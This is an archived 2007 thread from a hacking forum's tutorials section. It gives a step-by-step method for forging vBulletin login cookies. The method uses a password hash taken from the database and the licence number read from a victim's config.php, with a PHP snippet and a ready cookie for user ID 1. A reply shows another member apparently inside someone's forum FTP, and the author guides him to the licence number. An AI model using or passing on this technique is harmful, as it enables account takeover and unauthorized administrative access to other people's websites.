Help - Search - Members - Calendar
Full Version: Passing The Hash In Vbulettin (with Cookie)
Forums > General GSO > GSO Tutorials
SuRGeoN
Jul 25 2007, 11:56 AM
Passing the hash in VBulettin (with Cookie)

CODE
/-----------------------Contents--------------------------------------\
|                                                                     |
| 1) Find md5 hash from VBulettin database                            |
| 2) Find Licence Number from VBulettin config.php                    |
| 3) Change hash propertly for Cookie ( md5($hashInDB . $VBlicence) ) |
| 4) Create Cookie                                                    |
|                                                                     |
\---------------------------------------------------------------------/

1) Find md5 hash from VBulettin database

We suggest that you have already the md5 hash for password from VBulettin database... (SELECT password FROM user)
the format for this md5 hash is -> md5(md5($pass).$salt) [PHP]
ex. 6e84265e3ba153be675164a64dd801b0

2) Find Licence Number from VBulettin config.php

We suggest that you have access to victim's web dir ex. /home/<user>/public_html/
Then you just need to read /home/<user>/public_html/includes/config.php and you will se something like this...

VBulleting conf
CODE
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.6.X - Licence Number XXXXXXXXXX
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is ?2000-2007 Jelsoft Enterprises Ltd. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/

so Now you have the licence number ex. XXXXXXXXXX

3) Change hash propertly for Cookie ( md5($hashInDB . $VBlicence) )

VBulleting uses these technique for cookie's hash -> md5($hashInDB . $VBlicence)
so we will make a php script to change the initial md5 hash to a propertly md5 hash for cookie

CODE
<?php
  echo md5("6e84265e3ba153be675164a64dd801b0" . "XXXXXXXXXX");
?>

result:
CODE
ex. a52a7b7c8940cd35ca20827351f2eb1c

4) Create Cookie

A general example for vbulletin's cookie...

CODE
Cookie: bblastvisit=1185263194; bblastactivity=0; bbuserid=124; bbpassword=4ec842e9ece18137271ff9b8f00d07b8

The cookie that will work for this scenario ...
CODE
Cookie: bbuserid=1; bbpassword=a52a7b7c8940cd35ca20827351f2eb1c
ASTRAPI
Jul 27 2007, 08:56 PM
I was into a ftp from a forum and i found these folders:

2.2
cache
called _mail
converge_local
files
images
install
ips_kernel
jscripts
lofiversion
modules
OLD.VERSION
resources
retail
skin_acp
sources
style_avatars
style_captcha
style_emoticons
style_images
upgrade
uploads
warezadmin
admin.php
conf_global.php
emailer.php
index.php
init.php
info.php
topmembers.php

But i can't locate the database or /home/<user>/public_html/ or the config.php.
SuRGeoN
Jul 28 2007, 09:51 AM
it's not necessary that folder have this format /home/<user>/public_html/. You have to find
the vbulettin directory and see the contents of some .php file and at the beginning of the file
you will see the licence number.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2008 Invision Power Services, Inc.